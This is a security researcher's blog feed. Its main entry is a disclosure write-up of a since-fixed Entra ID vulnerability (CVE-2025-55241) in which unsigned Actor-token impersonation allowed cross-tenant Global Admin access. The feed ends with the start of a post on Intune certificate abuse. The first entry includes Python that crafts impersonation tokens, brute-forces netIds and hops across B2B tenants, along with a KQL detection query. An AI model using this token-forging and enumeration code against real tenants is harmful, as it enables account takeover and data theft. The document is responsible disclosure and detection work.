<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="https://dirkjanm.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://dirkjanm.io/" rel="alternate" type="text/html" /><updated>2025-09-17T13:11:50+00:00</updated><id>https://dirkjanm.io/feed.xml</id><title type="html">dirkjanm.io</title><subtitle>Dirk-jan&apos;s personal blog, mostly containing research on topics I find interesting, such as (Azure) Active Directory internals, protocols and vulnerabilities.</subtitle><author><name>Dirk-jan Mollema</name></author><entry><title type="html">One Token to rule them all - obtaining Global Admin in every Entra ID tenant via Actor tokens</title><link href="https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/" rel="alternate" type="text/html" title="One Token to rule them all - obtaining Global Admin in every Entra ID tenant via Actor tokens" /><published>2025-09-17T13:00:57+00:00</published><updated>2025-09-17T13:00:57+00:00</updated><id>https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens</id><content type="html" xml:base="https://dirkjanm.io/obtaining-global-admin-in-every-entra-id-tenant-with-actor-tokens/"><![CDATA[<p>While preparing for my Black Hat and DEF CON talks in July of this year, I found the most impactful Entra ID vulnerability that I will probably ever find. This vulnerability could have allowed me to compromise every Entra ID tenant in the world (except probably those in national cloud deployments<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>). If you are an Entra ID admin reading this, yes that means complete access to your tenant. 
The vulnerability consisted of two components: undocumented impersonation tokens, called “Actor tokens”, that Microsoft uses in their backend for service-to-service (S2S) communication, and a critical flaw in the (legacy) Azure AD Graph API that failed to properly validate the originating tenant, allowing these tokens to be used for cross-tenant access.</p>

<p>Effectively this means that with a token I requested in my lab tenant I could authenticate as <em>any user</em>, including Global Admins, in <em>any other tenant</em>. Because of the nature of these Actor tokens, they are not subject to security policies like Conditional Access, which means there was no setting that could have mitigated this for specific hardened tenants. Since the Azure AD Graph API is an older API for managing the core Azure AD / Entra ID service, access to this API could have been used to make any modification in the tenant that Global Admins can do, including taking over or creating new identities and granting them any permission in the tenant. With these compromised identities the access could also be extended to Microsoft 365 and Azure.</p>

<p>I reported this vulnerability the same day to the Microsoft Security Response Center (MSRC). Microsoft fixed this vulnerability on their side within days of the report being submitted and has rolled out further mitigations that block applications from requesting these Actor tokens for the Azure AD Graph API. Microsoft also issued <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55241">CVE-2025-55241</a> for this vulnerability.</p>

<h1 id="impact">Impact</h1>
<p>These tokens allowed full access to the Azure AD Graph API in any tenant. Requesting Actor tokens does not generate logs. Even if it did, the logs would be generated in my tenant rather than in the victim tenant, which means there is no record of the existence of these tokens.</p>

<p>Furthermore, the Azure AD Graph API does not have API level logging. Its successor, the Microsoft Graph, does have this logging, but for the Azure AD Graph this telemetry source is still in a very limited preview and I’m not aware of any tenant that currently has this available. Since there is no API level logging, it means the following Entra ID data could be accessed without any traces:</p>

<ul>
  <li>User information including all their personal details stored in Entra ID.</li>
  <li>Group and role information.</li>
  <li>Tenant settings and (Conditional Access) policies.</li>
  <li>Applications, Service Principals, and any application permission assignment.</li>
  <li>Device information and BitLocker keys synced to Entra ID.</li>
</ul>

<p>This information could be accessed by impersonating a regular user in the victim tenant. To get a sense of the full impact: my tool <a href="https://github.com/dirkjanm/ROADtools">roadrecon</a> uses the same API, so everything you find in its GUI could have been accessed and modified by an attacker abusing this flaw.</p>

<p>If a Global Admin was impersonated, it would also be possible to <strong>modify</strong> any of the above objects and settings. This would result in full tenant compromise with access to any service that uses Entra ID for authentication, such as SharePoint Online and Exchange Online. It would also provide full access to any resource hosted in Azure, since these resources are controlled from the tenant level and Global Admins can grant themselves rights on Azure subscriptions. Modifying objects in the tenant does (usually) result in audit logs being generated. That means that while theoretically all data in Microsoft 365 could have been compromised, doing anything other than reading the directory information would leave audit logs that could alert defenders, though without knowledge of the specific artifacts that modifications with these Actor tokens generate, it would appear as if a legitimate Global Admin performed the actions.</p>

<p>Based on Microsoft’s internal telemetry, they did not detect any abuse of this vulnerability. If you want to search for possible abuse artifacts in your own environment, a KQL detection is included at the end of this post.</p>

<h1 id="technical-details">Technical details</h1>
<h2 id="actor-tokens">Actor tokens</h2>
<p>Actor tokens are issued by the “Access Control Service”. I don’t know the exact origins of this service, but it appears to be a legacy service that is used for authentication with SharePoint applications and also seems to be used by Microsoft internally. I came across this service while investigating hybrid Exchange setups. These hybrid setups used to provision a certificate credential on the Exchange Online Service Principal (SP) in the tenant, with which Exchange can perform authentication. These hybrid attacks were the topic of some talks I did this summer; the slides are on the <a href="/talks/">talks</a> page. In this case the hybrid part is not relevant, as in my lab I could also have added a credential on the Exchange Online SP without the complete hybrid setup. Exchange is not the only app that can do this, but since I found this in Exchange we will keep talking about these tokens in the context of Exchange.</p>

<p>Exchange will request Actor tokens when it wants to communicate with other services on behalf of a user. The Actor token allows it to “act” as another user in the tenant when talking to Exchange Online, SharePoint and as it turns out the Azure AD Graph. The Actor token (a JSON Web Token / JWT) looks as follows when decoded:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
    "alg": "RS256",
    "kid": "_jNwjeSnvTTK8XEdr5QUPkBRLLo",
    "typ": "JWT",
    "x5t": "_jNwjeSnvTTK8XEdr5QUPkBRLLo"
}
{
    "aud": "00000002-0000-0000-c000-000000000000/graph.windows.net@6287f28f-4f7f-4322-9651-a8697d8fe1bc",
    "exp": 1752593816,
    "iat": 1752507116,
    "identityprovider": "00000001-0000-0000-c000-000000000000@6287f28f-4f7f-4322-9651-a8697d8fe1bc",
    "iss": "00000001-0000-0000-c000-000000000000@6287f28f-4f7f-4322-9651-a8697d8fe1bc",
    "nameid": "00000002-0000-0ff1-ce00-000000000000@6287f28f-4f7f-4322-9651-a8697d8fe1bc",
    "nbf": 1752507116,
    "oid": "a761cbb2-fbb6-4c80-aa50-504962316eb2",
    "rh": "1.AXQAj_KHYn9PIkOWUahpfY_hvAIAAAAAAAAAwAAAAAAAAACtAQB0AA.",
    "sub": "a761cbb2-fbb6-4c80-aa50-504962316eb2",
    "trustedfordelegation": "true",
    "xms_spcu": "true"
}.[signature from Entra ID]
</code></pre></div></div>
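<p>The two JSON structures above are simply the base64url-decoded header and claims segments of the JWT. A quick way to inspect such tokens is to decode the segments without verifying the signature; a minimal sketch using only the Python standard library:</p>

```python
import base64
import json

def decode_jwt_claims(token: str):
    """Decode a JWT's header and claims without verifying the signature."""
    def b64url_decode(segment: str) -> dict:
        # JWTs use unpadded base64url; restore the padding before decoding
        segment += "=" * (-len(segment) % 4)
        return json.loads(base64.urlsafe_b64decode(segment))

    header_seg, claims_seg = token.split(".")[:2]
    return b64url_decode(header_seg), b64url_decode(claims_seg)
```

<p>Running this on an Actor token surfaces the <code class="language-plaintext highlighter-rouge">aud</code> and <code class="language-plaintext highlighter-rouge">trustedfordelegation</code> claims discussed below.</p>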

<p>There are a few fields here that differ from regular Entra ID access tokens:</p>

<ul>
  <li>The <code class="language-plaintext highlighter-rouge">aud</code> field contains the GUID of the Azure AD Graph API, as well as the URL <code class="language-plaintext highlighter-rouge">graph.windows.net</code> and the tenant it was issued to <code class="language-plaintext highlighter-rouge">6287f28f-4f7f-4322-9651-a8697d8fe1bc</code>.</li>
  <li>The expiry is exactly 24 hours after the token was issued.</li>
  <li>The <code class="language-plaintext highlighter-rouge">iss</code> contains the GUID of the Entra ID token service itself, called “Azure ESTS Service”, and again the tenant GUID where it was issued.</li>
  <li>The token contains the claim <code class="language-plaintext highlighter-rouge">trustedfordelegation</code>, which is <code class="language-plaintext highlighter-rouge">True</code> in this case, meaning we can use this token to impersonate other identities. Many Microsoft apps could request such tokens. Non-Microsoft apps requesting an Actor token would receive a token with this field set to <code class="language-plaintext highlighter-rouge">False</code> instead.</li>
</ul>

<p>When using this Actor token, Exchange would embed it in an <strong>unsigned</strong> JWT that is then sent to the resource provider, in this case the Azure AD Graph. In the rest of the blog I call these <strong>impersonation tokens</strong> since they are used to impersonate users.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
    "alg": "none",
    "typ": "JWT"
}
{
    "actortoken": "eyJ0eXAiOiJKV1Qi&lt;snip&gt;TxeLkNB8v2rWWMLGpaAaFJlhA",
    "aud": "00000002-0000-0000-c000-000000000000/graph.windows.net@6287f28f-4f7f-4322-9651-a8697d8fe1bc",
    "exp": 1756926566,
    "iat": 1756926266,
    "iss": "00000002-0000-0ff1-ce00-000000000000@6287f28f-4f7f-4322-9651-a8697d8fe1bc",
    "nameid": "10032001E2CBE43B",
    "nbf": 1756926266,
    "nii": "urn:federation:MicrosoftOnline",
    "sip": "doesnt@matter.com",
    "smtp": "doesnt@matter.com",
    "upn": "doesnt@matter.com"
}.[no signature]
</code></pre></div></div>
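<p>Because the wrapper uses <code class="language-plaintext highlighter-rouge">alg</code> “none”, anyone holding an Actor token can construct such an impersonation token locally, with no call to Entra ID. A sketch of building one with the claim layout shown above (the five-minute validity mirrors the example token; the placeholder UPN is arbitrary since it is not validated):</p>

```python
import base64
import json
import time

def b64url(data: dict) -> str:
    raw = json.dumps(data, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")

def craft_impersonation_token(actor_token: str, tenant_id: str, net_id: str,
                              upn: str = "doesnt@matter.com") -> str:
    """Build an unsigned (alg "none") impersonation token around an Actor token,
    mirroring the claim layout shown above."""
    now = int(time.time())
    header = {"alg": "none", "typ": "JWT"}
    claims = {
        "actortoken": actor_token,
        "aud": f"00000002-0000-0000-c000-000000000000/graph.windows.net@{tenant_id}",
        "iss": f"00000002-0000-0ff1-ce00-000000000000@{tenant_id}",
        "iat": now, "nbf": now, "exp": now + 300,  # 5 minutes, as in the example
        "nameid": net_id,
        "nii": "urn:federation:MicrosoftOnline",
        "sip": upn, "smtp": upn, "upn": upn,
    }
    # No signature: the third JWT segment stays empty
    return f"{b64url(header)}.{b64url(claims)}."
```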

<p>The <code class="language-plaintext highlighter-rouge">sip</code>, <code class="language-plaintext highlighter-rouge">smtp</code> and <code class="language-plaintext highlighter-rouge">upn</code> fields are used when accessing resources in Exchange Online or SharePoint, but are ignored when talking to the Azure AD Graph, which only cares about the <code class="language-plaintext highlighter-rouge">nameid</code>. This <code class="language-plaintext highlighter-rouge">nameid</code> originates from a user attribute called the <code class="language-plaintext highlighter-rouge">netId</code> on the Azure AD Graph. You will also see it reflected in tokens issued to users, in the <code class="language-plaintext highlighter-rouge">puid</code> claim, which stands for Passport UID. I believe these identifiers are an artifact from the original codebase which Microsoft used for its Microsoft Accounts (consumer accounts or MSA). They are still used in Entra ID, for example to map guest users to the original identity in their home tenant.</p>

<p>As I mentioned before, these impersonation tokens are not signed. That means that once Exchange has an Actor token, it can use the one Actor token to impersonate anyone against the target service it was requested for, for 24 hours. In my personal opinion, this whole Actor token design is something that never should have existed. It lacks almost every security control that you would want:</p>

<ul>
  <li>There are no logs when Actor tokens are issued.</li>
  <li>Since these services can craft the unsigned impersonation tokens without talking to Entra ID, there are also no logs when they are created or used.</li>
  <li>They cannot be revoked within their 24 hours validity.</li>
  <li>They completely bypass any restrictions configured in Conditional Access.</li>
  <li>We have to rely on logging from the resource provider to even know these tokens were used in the tenant.</li>
</ul>

<p>Microsoft uses these tokens to talk to other services in their backend, something that Microsoft calls service-to-service (S2S) communication. If one of these tokens leaks, it can be used to access all the data in an entire tenant without any useful telemetry or mitigation. In July of this year, Microsoft did publish <a href="https://www.microsoft.com/en-us/security/blog/2025/07/08/enhancing-microsoft-365-security-by-eliminating-high-privilege-access/">a blog</a> about removing these insecure legacy practices from their environment, but they do not provide any transparency about how many services still use these tokens.</p>

<h2 id="the-fatal-flaw-leading-to-cross-tenant-compromise">The fatal flaw leading to cross-tenant compromise</h2>
<p>As I was refining my slide deck and polishing up my proof-of-concept code for requesting and generating these tokens, I tested more variants of using these tokens, changing various fields to see if the tokens still worked with the modified information. As one of the tests I changed the tenant ID of the impersonation token to a different tenant in which none of my test accounts existed. The Actor token’s tenant ID was my <code class="language-plaintext highlighter-rouge">iminyour.cloud</code> tenant, with tenant ID <code class="language-plaintext highlighter-rouge">6287f28f-4f7f-4322-9651-a8697d8fe1bc</code>, and the unsigned JWT I generated had the tenant ID <code class="language-plaintext highlighter-rouge">b9fb93c1-c0c8-4580-99f3-d1b540cada32</code>.</p>

<p><img src="/assets/img/actortokens/tenantchange.png" alt="Changed tenant ID" /></p>

<p>I sent this token to <code class="language-plaintext highlighter-rouge">graph.windows.net</code> using my CLI tool <code class="language-plaintext highlighter-rouge">roadtx</code>, expecting a generic access denied since I had a tenant ID mismatch. However, I was instead greeted by a curious error message:</p>

<p><img src="/assets/img/actortokens/usernotfound.png" alt="Error message indicating the user does not exist" /></p>

<p><em>Note that these are the actual screenshots I made during my research, which is why the formatting may not work as well in this blog</em></p>

<p>The error message suggested that while my token was valid, the identity could not be found in the tenant. Somehow the API seemed to accept my token even with the mismatching tenant. I quickly looked up the <code class="language-plaintext highlighter-rouge">netId</code> of a user that did exist in the target tenant, crafted a token and the Azure AD Graph happily returned the data I requested. I tested this in a few more test tenants I had access to, to make sure I was not crazy, but I could indeed access data in other tenants, as long as I knew their tenant ID (which is public information) and the <code class="language-plaintext highlighter-rouge">netId</code> of a user in that tenant.</p>
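<p>For illustration, such a request to the Azure AD Graph is an ordinary bearer-token HTTP call; a sketch of preparing it (assuming the commonly used <code class="language-plaintext highlighter-rouge">api-version=1.6</code>):</p>

```python
import urllib.request

def build_graph_request(tenant_id: str, token: str, path: str = "users"):
    """Prepare a bearer-token request against the legacy Azure AD Graph."""
    url = f"https://graph.windows.net/{tenant_id}/{path}?api-version=1.6"
    return urllib.request.Request(url, headers={
        "Authorization": f"Bearer {token}",
        "Accept": "application/json",
    })

# Sending it: urllib.request.urlopen(build_graph_request(tenant_id, token))
```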

<p>To demonstrate the vulnerability, here I am using a Guest user in the target tenant to query the <code class="language-plaintext highlighter-rouge">netId</code> of a Global Admin. Then I impersonate the Global Admin using the same Actor token, and can perform any action in the tenant as that Global Admin over the Azure AD Graph.</p>

<p>First I craft an impersonation token for a Guest user in my victim tenant:</p>

<p><img src="/assets/img/actortokens/guesttoken.png" alt="Craft impersonation token for Guest user" /></p>

<p>I use this token to query the <code class="language-plaintext highlighter-rouge">netId</code> of a Global Admin:</p>

<p><img src="/assets/img/actortokens/findga.png" alt="Query Global Admin" /></p>

<p>Then I create an impersonation token for this Global Admin (the UPN is kept the same since it is not validated by the API):</p>

<p><img src="/assets/img/actortokens/gaimpersonate.png" alt="Craft impersonation token for Global Admin" /></p>

<p>And finally this token is used to access the tenant as the Global Admin, listing the users, something the guest user was not able to do:</p>

<p><img src="/assets/img/actortokens/queryusers.png" alt="Query data in the tenant" /></p>

<p>I can even run roadrecon with this impersonation token, which queries all Azure AD Graph API endpoints to enumerate the available information in the tenant.</p>

<p><img src="/assets/img/actortokens/runroadrecon.png" alt="Running roadrecon in a tenant with an impersonation token" /></p>

<p>None of these actions would generate any logs in the victim tenant.</p>

<h1 id="practical-abuse">Practical abuse</h1>
<p>With this vulnerability it would be possible to compromise any Entra ID tenant. Starting with an Actor token from an attacker controlled tenant, the following steps would lead to full control over the victim tenant:</p>

<ol>
  <li>Find the tenant ID for the victim tenant, this can be done using public APIs based on the domain name.</li>
  <li>Find a valid <code class="language-plaintext highlighter-rouge">netId</code> of a regular user in the tenant. Methods for this will be discussed below.</li>
  <li>Craft an impersonation token with the Actor token from the attacker tenant, using the tenant ID and <code class="language-plaintext highlighter-rouge">netId</code> of the user in the victim tenant.</li>
  <li>List all Global Admins in the tenant and their <code class="language-plaintext highlighter-rouge">netId</code>.</li>
  <li>Craft an impersonation token for the Global Admin account.</li>
  <li>Perform any read or write action over the Azure AD Graph API.</li>
</ol>
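<p>Step 1 relies only on public endpoints: the tenant GUID can, for example, be pulled from the issuer in the tenant’s OpenID Connect configuration document. A sketch (the parsing helper is my own):</p>

```python
import json
import re
import urllib.request

OPENID_URL = "https://login.microsoftonline.com/{domain}/v2.0/.well-known/openid-configuration"
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")

def tenant_id_from_config(config: dict) -> str:
    """Pull the tenant GUID out of the issuer of an OpenID configuration document."""
    match = GUID_RE.search(config["issuer"])
    if not match:
        raise ValueError("no tenant GUID found in issuer")
    return match.group(0)

def resolve_tenant_id(domain: str) -> str:
    """Resolve a domain name to its tenant ID via the public discovery endpoint."""
    with urllib.request.urlopen(OPENID_URL.format(domain=domain)) as resp:
        return tenant_id_from_config(json.load(resp))
```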

<p>If an attacker makes any modifications in the tenant in step 6, that would be the only event in this chain that generates any telemetry in the victim tenant. An attacker could for example create new user accounts, grant these Global Admin privileges and then sign in interactively to any Entra ID, Microsoft 365 or third party application that integrates with the victim tenant. Alternatively they could add credentials on existing applications, grant these apps API permissions and use that to exfiltrate emails or files from Microsoft 365, a technique that is popular among threat actors. An attacker could also add credentials to <a href="https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/">Microsoft Service Principals</a> in the victim tenant, several of which can request Actor tokens that allow impersonation against SharePoint or Exchange. For my DEF CON and Black Hat talks I made a demo video about using these Actor tokens to obtain Global Admin access. The video uses Actor tokens within a tenant, but the same technique could have been applied to any other tenant by abusing this vulnerability.</p>

<video width="100%" controls="">
  <source src="/assets/raw/demo_graph.mp4" type="video/mp4" />
</video>

<h2 id="finding-netids">Finding netIds</h2>
<p>Since tenant IDs can be resolved when the domain name of a tenant is known, the only identifier that is not immediately available to the attacker is a valid <code class="language-plaintext highlighter-rouge">netId</code> for a user in that specific tenant. As I mentioned above, these IDs are added to Entra ID access tokens as the <code class="language-plaintext highlighter-rouge">puid</code> claim. Any token found online, in screenshots, examples or logs, even those that are long expired or with an obfuscated signature, would provide an attacker with enough information to breach the tenant. Threat actors that still have old tokens for any tenant from previous breaches can immediately access those tenants again as long as the victim account still exists.</p>

<p>The above is probably not a very common occurrence. A more realistic attack is simply brute-forcing the <code class="language-plaintext highlighter-rouge">netId</code>. Unlike object IDs, which are randomly generated, netIds are incremental. Looking at the differences in netIds between my tenant and some tenants I analyzed, I found the gap between a newly created user in my tenant and their newest user to be in the range of 100,000 to 100 million. Brute-forcing the <code class="language-plaintext highlighter-rouge">netId</code> could therefore be accomplished in minutes to hours for any target tenant, and the more users exist in a tenant, the easier it is to find a match. Since this does not generate any logs, it isn’t a noisy attack either. Because of the possibility to brute-force these netIds, I would say this vulnerability could have been used to take over any tenant without any prerequisites. There is, however, a third technique which is even more effective (and more fun on a technical level).</p>
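<p>A brute-force sketch under the assumption stated above, namely that netIds are incremental hexadecimal values reasonably close to a reference value from the attacker’s own tenant (the helper and window size are illustrative):</p>

```python
def candidate_netids(reference_netid: str, window: int = 1_000_000):
    """Yield candidate netIds outward from a reference value, assuming netIds
    are incremental hexadecimal values (width preserved from the reference)."""
    base = int(reference_netid, 16)
    width = len(reference_netid)
    for offset in range(1, window + 1):
        # Search in both directions from the reference value
        yield format(base - offset, f"0{width}X")
        yield format(base + offset, f"0{width}X")
```

<p>Each candidate can be placed in an impersonation token; a “user not found” style error versus returned data silently distinguishes misses from hits.</p>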

<h2 id="compromising-tenants-by-hopping-over-b2b-trusts">Compromising tenants by hopping over B2B trusts</h2>
<p>I previously mentioned that a user’s <code class="language-plaintext highlighter-rouge">netId</code> is used to establish links between a user’s accounts in multiple tenants. This is something that I researched a few years ago when I gave a talk at <a href="/assets/raw/US-22-Mollema-Backdooring-and-hijacking-Azure-AD-accounts_final.pdf">Black Hat USA 22</a> about external identities. The below screenshot is taken from one of my slides, which illustrates this:</p>

<p><img src="/assets/img/actortokens/guestlink.png" alt="Guest user link based on netid" /></p>

<p>The way this works is as follows. Suppose we have tenant A and tenant B. A user in tenant B is invited into tenant A. In the new guest account that is created in tenant A, their <code class="language-plaintext highlighter-rouge">netId</code> is stored on the <code class="language-plaintext highlighter-rouge">alternativeSecurityIds</code> attribute. That means that an attacker wanting to abuse this bug can simply read that attribute in tenant A, put it in an impersonation token for tenant B and then impersonate the victim in their home tenant. It should be noted that this works <strong>against the direction of invite</strong>. Any user in any tenant where you accept an invite will be able to read your <code class="language-plaintext highlighter-rouge">netId</code>, and with this bug could have impersonated you in your home tenant. In your home tenant you have a full user account, which can enumerate other users. This is not a bug or risk with B2B trusts, but is simply an unintended consequence of the B2B design mechanism. A guest account in someone else’s tenant would also be sufficient with the default Entra ID guest settings because the default settings allow users to query the <code class="language-plaintext highlighter-rouge">netId</code> of a user as long as the UPN is known.</p>
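<p>The attribute lookup and domain recovery can be sketched as follows, assuming the default guest UPN format (<code class="language-plaintext highlighter-rouge">user_homedomain.com#EXT#@invitingtenant.onmicrosoft.com</code>); the exact OData filter support on the Azure AD Graph is an assumption here:</p>

```python
def guest_netid_query_url(tenant_id: str) -> str:
    """Azure AD Graph query for guest users and the attribute that stores
    their home-tenant netId (illustrative; OData support is assumed)."""
    return (f"https://graph.windows.net/{tenant_id}/users"
            "?api-version=1.6"
            "&$filter=userType eq 'Guest'"
            "&$select=userPrincipalName,alternativeSecurityIds")

def home_domain(guest_upn: str) -> str:
    """Recover the home domain from the default guest UPN format:
    user_homedomain.com#EXT#@invitingtenant.onmicrosoft.com"""
    local_part = guest_upn.split("#EXT#")[0]
    return local_part.rsplit("_", 1)[1]
```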

<p>To abuse this, a threat actor could perform the following steps, given that they have access to at least one tenant with a guest user:</p>

<ol>
  <li>Query the guest users and their <code class="language-plaintext highlighter-rouge">alternativeSecurityIds</code> attribute which gives the <code class="language-plaintext highlighter-rouge">netId</code>.</li>
  <li>Query the tenant ID of the guest users home tenant based on the domain name in their UPN.</li>
  <li>Create an impersonation token, impersonating the victim in their home tenant.</li>
  <li>Optionally list Global Admins and impersonate those to compromise the entire tenant.</li>
  <li>Repeat step 1 for each tenant that was compromised.</li>
</ol>
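<p>The steps above amount to a breadth-first traversal of the B2B trust graph. A sketch with hypothetical callbacks standing in for the two calls per tenant:</p>

```python
from collections import deque

def hop_tenants(start_tenant, list_guest_netids, resolve_home_tenant):
    """Breadth-first sketch of the B2B hopping steps above.
    `list_guest_netids` and `resolve_home_tenant` are hypothetical callbacks
    standing in for the guest query and tenant discovery calls."""
    seen = {start_tenant}
    queue = deque([start_tenant])
    while queue:
        tenant = queue.popleft()
        for upn, netid in list_guest_netids(tenant):
            home = resolve_home_tenant(upn)
            if home not in seen:
                seen.add(home)  # netId + home tenant ID = impersonation material
                queue.append(home)
    return seen
```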

<p>The steps above can be done in two API calls per tenant, which do not generate any logs. Most tenants will have guest users from multiple distinct other tenants. This means the number of tenants you compromise with this scales exponentially, and the information needed to compromise the majority of all tenants worldwide could have been gathered within minutes using a single Actor token. Once at least one user is known per victim tenant, the attacker can selectively perform post-compromise actions in these tenants by impersonating Global Admins.</p>

<p>Looking at the list of guest users in the tenants of some of my clients, this technique would be extremely powerful. I also observed that one of the first tenants you will likely compromise is Microsoft’s own tenant, since Microsoft consultants often get invited to customer tenants. Many MSPs and Microsoft Partners will have a guest account in the Microsoft tenant, so from the Microsoft tenant a compromise of most major service provider tenants is one step away.</p>

<p>Needless to say, as much as I would have liked to test this technique in practice to see how fast this would spread out, I only tested the individual steps in my own tenants and did not access any data I’m not authorized to.</p>

<h1 id="detection">Detection</h1>
<p>While querying data over the Azure AD Graph does not leave any logs, modifying data does (usually) generate audit logs. If modifications are done with Actor tokens, these logs look a bit curious.</p>

<p><img src="/assets/img/actortokens/initiatedby.png" alt="Initiated by exchange and a global admin" class="align-center" width="60%" /></p>

<p>Since Actor tokens involve both the app and the user being impersonated, it seems Entra ID gets confused about who actually made the change, and it will log the UPN of the impersonated Global Admin, but the display name of Exchange. Luckily for defenders this creates a nice giveaway when Actor tokens are used in the tenant. After some testing and filtering with some fellow researchers who work on the blue side (thanks to Fabian Bader and Olaf Hartong) we came up with the following detection query:</p>

<pre><code class="language-kql">AuditLogs
| where not(OperationName has "group")
| where not(OperationName == "Set directory feature on tenant")
| where InitiatedBy has "user"
| where InitiatedBy.user.displayName has_any ( "Office 365 Exchange Online", "Skype for Business Online", "Dataverse", "Office 365 SharePoint Online", "Microsoft Dynamics ERP")
</code></pre>

<p>The exclusion for group operations is there because some of these products do actually use Actor tokens to perform operations on your behalf. For example, creating certain group types via the Exchange Online PowerShell module makes Exchange use an Actor token on your behalf to create the group in Entra ID.</p>

<h1 id="conclusion">Conclusion</h1>
<p>This blog discussed a critical token validation failure in the Azure AD Graph API. While the vulnerability itself was a bad oversight in the token handling, the Actor token mechanism itself was deliberately designed with all the problematic properties described in the sections above. If it weren’t for the complete lack of security controls in these tokens, I don’t think such a big impact with so little telemetry would have been possible.</p>

<p>Thanks to the people at MSRC who immediately picked up the vulnerability report, searched for potential variants in other resources, and to the engineers who followed up with fixes for the Azure AD Graph and blocked Actor tokens for the Azure AD Graph API requested with credentials stored on Service Principals, essentially restricting the usage of these Actor tokens to only Microsoft internal services.</p>

<h2 id="disclosure-timeline">Disclosure timeline</h2>

<ul>
  <li>July 14, 2025 - reported issue to MSRC.</li>
  <li>July 14, 2025 - MSRC case opened.</li>
  <li>July 15, 2025 - reported further details on the impact.</li>
  <li>July 15, 2025 - MSRC requested to halt further testing of this vulnerability.</li>
  <li>July 17, 2025 - Microsoft pushed a fix for the issue globally into production.</li>
  <li>July 23, 2025 - Issue confirmed as resolved by MSRC.</li>
  <li>August 6, 2025 - Further mitigations pushed out preventing Actor tokens being issued for the Azure AD Graph with SP credentials.</li>
  <li>September 4, 2025 - <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55241">CVE-2025-55241</a> issued.</li>
  <li>September 17, 2025 - Release of this blogpost.</li>
</ul>

<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>I do not have access to any tenants in a national cloud deployment, so I was not able to test whether the vulnerability existed there. Since national cloud deployments use their own token signing keys, it is unlikely that it would have been possible to execute this attack from a tenant in the public cloud to one of these national clouds. I do consider it likely that this attack would have worked across tenants in the same national cloud deployments, but that is speculation. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[While preparing for my Black Hat and DEF CON talks in July of this year, I found the most impactful Entra ID vulnerability that I will probably ever find. One that could have allowed me to compromise every Entra ID tenant in the world (except probably those in national cloud deployments). If you are an Entra ID admin reading this, yes that means complete access to your tenant. The vulnerability consisted of two components: undocumented impersonation tokens that Microsoft uses in their backend for service-to-service (S2S) communication, called "Actor tokens", and a critical vulnerability in the (legacy) Azure AD Graph API that did not properly validate the originating tenant, allowing these tokens to be used for cross-tenant access.]]></summary></entry><entry><title type="html">Extending AD CS attack surface to the cloud with Intune certificates</title><link href="https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs/" rel="alternate" type="text/html" title="Extending AD CS attack surface to the cloud with Intune certificates" /><published>2025-07-30T14:00:57+00:00</published><updated>2025-07-30T14:00:57+00:00</updated><id>https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs</id><content type="html" xml:base="https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs/"><![CDATA[<p>Active Directory Certificate Services (AD CS) attack surface is pretty well explored in Active Directory itself, with <em>*checks notes*</em> already 16 “ESC” attacks being publicly described. Hybrid certificate attack paths have not gained that much attention yet, though I have come across several hybrid integrations while reviewing cloud configurations. In these setups, certificates are rolled out to cloud-managed endpoints via Microsoft Intune and the Intune certificate connector. 
The certificate connector runs in on-premises AD and requests the certificates on AD CS via the SCEP or PKCS integrations. In such environments, it would be possible to request certificates with arbitrary subjects as an Intune administrator. What I have also observed in some cases are certificate configurations in Intune being misconfigured in a way that would allow <strong>regular users</strong> to perform the same attack and effectively perform ESC1 over Intune certificates. That means going from regular user and their endpoint to Domain Admin in AD, all from the cloud. This blog explores the scenarios where this is possible and provides exploitation and remediation guidance.</p>

<h2 id="the-setup">The setup</h2>
<p>Intune supports a “Certificate Connector” that can be installed on-prem, to allow Intune to request certificates in AD CS. The certificate connector is <a href="https://learn.microsoft.com/en-us/intune/intune-service/protect/certificate-connector-overview">documented here</a> and provides 3 options for distributing certificates:</p>

<ul>
  <li><strong>PKCS</strong>, which requests the certificates in AD CS using an Intune generated private key, and pushes the certificate plus the key to the device.</li>
  <li><strong>SCEP</strong>, in which case the device requests the certificate over the Simple Certificate Enrollment Protocol using an Intune provided “challenge”. The SCEP endpoint is usually internet exposed through a proxy.</li>
  <li><strong>PFX import</strong>, which distributes administrator uploaded PFX certificates to devices (not covered in this blog).</li>
</ul>

<p>The certificate connector is usually installed on a standalone server in AD, and in case of the SCEP protocol will also need the Network Device Enrollment Service (NDES) server role (part of AD CS). In addition, both of these configuration options require an AD CS certificate template that allows user supplied SANs. On the AD side, such a template would look as follows (output from Certipy):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  1
    Template Name                       : NDES-Computer
    Display Name                        : NDES-Computer
    Certificate Authorities             : hybrid-HYBRID-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 4
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2025-05-22T14:09:06+00:00
